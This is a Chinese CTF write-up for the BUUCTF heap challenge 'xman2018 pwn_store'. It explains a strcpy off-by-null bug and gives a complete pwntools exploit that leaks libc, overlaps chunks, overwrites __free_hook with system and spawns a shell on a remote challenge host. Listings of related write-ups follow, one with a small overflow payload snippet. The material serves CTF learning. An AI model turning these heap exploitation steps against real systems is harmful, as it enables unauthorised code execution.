[BUUCTF-pwn] xman冬令营选拔赛_2018_pwn_store

最新推荐文章于 2024-11-27 14:46:39 发布
原创 最新推荐文章于 2024-11-27 14:46:39 发布 · 326 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #c语言 #开发语言

该博客详细介绍了如何利用程序中strcpy函数的off_by_null漏洞进行内存操作,通过建立、编辑、释放堆块,操纵tcache实现内存破坏。作者展示了具体的漏洞利用步骤,包括构造缓冲区、修改pre_inuse字段、利用ABC方法等,最终目标是获取libc基地址并执行任意代码。

no坑no题。这题的坑太害人

看上去是个简单的堆里,edit name时用strcpy有off_by_null漏洞,只需要作ABC t先释放A通过B修改c的pre_inuse=0,再释放C得到合并。再申请到B,释放B,再写入free_hook就行了

漏洞点:

        strcpy复制时会在尾部带\0

unsigned __int64 m2edit()
{
  int v0; // eax
  unsigned int v2; // [rsp+Ch] [rbp-44h] BYREF
  char s[8]; // [rsp+10h] [rbp-40h] BYREF
  char v4[48]; // [rsp+18h] [rbp-38h] BYREF
  unsigned __int64 v5; // [rsp+48h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(s, 0, 0x30uLL);
  puts("Which one?");
  __isoc99_scanf("%u", &v2);
  if ( dword_20203C && v2 <= 0x10 && *((_QWORD *)&unk_202048 + 3 * v2) )
  {
    printf("New name:");
    readn((__int64)v4, 40);
    strcpy(*((char **)&unk_202048 + 3 * v2), v4);// off_by_null
    printf("New goods:");

步骤:

  1. 由于有size限制不能直接释放到unsort所有,先建12个块(大概用到10个)
  2. 释放7个填满tcache,再释放得到unsort
  3. 建1字节块,写1个字节得到libc(没有show,但输入后会回显)
  4. 这时候可能edit1.name利用off_by_null修改3的pre_inuse。但写满40后会有个垃圾字节。经过反复测试发现这个垃圾是上一次建块的size。
  5. 选建个100,然后通过ABC方法,向前合并,得到重叠tcache_attack
from pwn import *

local = 0

def connect():
    global p,libc_elf,one,libc_start_main_ret
    
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 28353) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

elf = ELF('./pwn')
context.arch = 'amd64'

menu = b">> "
def add(size, msg=b'b\n', name=b'b\n'):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"Order name:", name)
    p.sendlineafter(b"How many:", str(size).encode())
    p.sendafter(b"Goods' name:", msg)

def edit(idx, msg=b'a\n', goods=b'a\n'):
    p.sendlineafter(menu, b'2') 
    p.sendlineafter(b"Which one?", str(idx).encode())
    p.sendafter(b"New name:", msg)
    p.sendafter(b"New goods:", goods)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Which one?", str(idx).encode())

def pwn():
    context.log_level = 'debug'

    for i in range(12):
        add(0xf8)
    for i in range(7,-1,-1):
        if i == 7:
            add(0x40)
        free(i)

    add(1, msg=b'\xa0')

    p.recvuntil(b'Goods of order[5] :')
    malloc_hook = u64(p.recvline()[:-1].ljust(8, b'\x00')) -0x100 -0x60 -0x10 
    libc_base   = malloc_hook - libc_elf.sym['__malloc_hook']
    free_hook   = libc_base + libc_elf.sym['__free_hook']
    system      = libc_base + libc_elf.sym['system']
    print('libc:', hex(libc_base), hex(malloc_hook))
    
    add(0x100, name=b'A'*0x28)  #0xf8
    edit(1, b'A'*0x28)
    edit(1, b'A'*0x27+b'\n')
    edit(1, b'A'*0x26+b'\n')
    edit(1, b'A'*0x25+b'\n')
    edit(1, b'A'*0x24+b'\n')
    edit(1, b'A'*0x23+b'\n')
    edit(1, b'A'*0x20+ p64(0x240))
    add(0xf8) #2
    add(0xf8) #3
    
    free(10)
    free(11)
    free(3)
    
    #
    add(0x120) #3
    free(0)
    edit(3, goods=b'A'*0xd8 + p64(0x31) + p64(free_hook)+ b'\n')
    add(0x18, name=b'/bin/sh\x00\n') #0
    add(0xf8, name=p64(system)+ b'\n')
    
    free(0)
    #gdb.attach(p)
    #pause()
    
    p.sendline(b'cat /flag')  
    p.interactive()
    
connect()
pwn()

Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 941
arm32-pwn从环境搭建到实战 关于arm的pwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
CTF大赛】第五届XMan选拔赛 ezCM Writeup
HBohan的博客
08-12 1173
ezCM 直至比赛结束,这道题目都是 0 解题,一方面是因为比赛时间较短,另一方面还是因为这道题目较难,考察了不常见的椭圆曲线算法(ECC),大大增加了对做题者的要求。 题目信息 题目是使用 Golang 来编写的一个 CrackMe 程序,程序内符号没有被去除,所以这篇文章就不会讲解如何恢复 Golang 程序符号,另外 IDA Pro 7.6 已经支持 Golang 程序分析,打开就可以直接恢复被去除的符号信息。 题目要求打开一个 KeyFile ,并且通过读取其文件的内容来注册程序,我们要做的就是通
Xman 选拔赛 NoLeak writeup
charlie_heng的专栏
08-09 851
很久没发博客了,就随便写一下吧 想出一道House of Roman的题,然后去找了下类似的题目,记起来选拔赛的时候好像有一道NoLeak,那时候队里面的师傅做了,我就懒得做了,现在回顾了下,发现根本不用house of Roman就能get shell,直接partial write就可以写malloc hook,然后将shell code 写到bss段,跳到bss段get shell 下面...
WriteUp – 2018年“华为杯”极客出发XMan冬令营线上CTF选拔赛
weixin_34122810的博客
02-05 476
Mobile 第二题:返老还童(1000pt) 拿到apk之后丢进JEB,发现只有.class,java代码,没有so。整个apk的class文件结构如下: a.a.a com.reverse.daydayup.a com.reverse.daydayup.b com.reverse.daydayup.MainActivity 阅读Ma...
XMAN
csu_vc的博客
07-17 1571
先从web开始说起吧,因为错过了时间所以在平台关闭之前抓紧时间练了一练,中间请教了几个大佬web第一题——variacover拿到题目,是个源代码 发现这里存在变量覆盖,还有看到两个MD5==,往弱口令方向想,然后 一开始我还不知道为什么,然后搜了一下才懂得 0e后面会被识别成0的10的多少次方,再加上php是弱语言,会自动判断数据类型,所以零=零WEB第二题——urldecode
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 386
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
BUUCTF-PWN题详解(pwn1_sctf_2016 1&jarvisoj_level0 1)
2302_80325559的博客
11-27 2678
今天给大家介绍了几个危险函数strcpy、read,以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题,思路大差不差,都是先找从哪儿溢出,然后后门的地址。如果大家可以自己独立做出来的话,就可以说只要以后见到这种题,分分钟拿下。后面的题就不会留这么明显的后门给我们了,会让我们自己创建后门,难度会大一点点。我尽量以简洁的语言给大家说清楚,大家一起加油!
BUUCTF-PWN】5-pwn1_sctf_2016
燕麦葡萄干的博客
07-04 354
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 705
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
[BUUCTF-pwn]——ciscn_2019_ne_5
Y_peak的博客
02-11 507
[BUUCTF-pwn]——ciscn_2019_ne_5 题目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5 checksec下 在IDA中,竟然不给我反汇编,第一次碰到. 查了下解决方法,在反汇编失败的地方,单独反汇编就好. int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // [esp+0h] [ebp-100h] char src[4]
2022强网拟态pwn-store
z1r0的博客
11-22 919
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
pwntools实战CTFpwn
Yale的博客
01-30 3036
Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mips/pow...
第62天:2019Xman冬令营选拔赛部分writeup
S1lenc3的博客
12-31 895
Mobile 直接拖入JEB, 标准的输入和提交。 然后把输入框的值赋给passt和flagt。分别是Long和string 然后判断flagt是否为空,最后调用原生方法check。 啥都不用想,直接解压上IDA。 Arm汇编压根不会,直接看伪代码猜吧。 这三个估计就是调用Factor类的factor方法,参数是passt。 然后继续走到下一个函数。 a5...
Xman资格选拔赛-web
weixin_30709929的博客
07-20 970
variacover 这道题一打开就是源码,主要就是根据源码构造url。其中,它接收的参数只有b,但源码中要获取flag的关键参数是a[0]。parse_str()函数的作用是把查询字符串解析到变量中,于是我们可以通过将a[0]嵌入b的传参中,然后由这个函数再将a[0]提取出来,解析出a[0]后,还需要满足其值是MD5加密后与MD5('QNKCDZO’)的值相等,但加密前的字符串不相等,因为QN...
XMAN选拔赛官方Writeup
热门推荐
zsj2102的专栏
07-20 3万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
LLVM pass pwn 入门 (3)
CoLin的pwn小屋
07-19 1009
LLVM pass pwn 入门:红帽杯2021-simpleVM题解
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2298
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
[WP]第五届XMan选拔赛web
xiongshivigor的博客
08-11 477
第五届XMan选拔赛 本次比赛一共三道web,一道签到题就不用说了,另外两道貌似也都不是很难的题,但是确实水个人平太菜,没都做做出来,还是逐步积累经验吧 easyphp <?php error_reporting(0); highlight_file(__FILE__); class XMAN{ public $class; public $para; public $check; public function __construct() {
XMAN2017选拔赛Web-variacover
hyrzhrc的博客
07-16 2126
由于PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值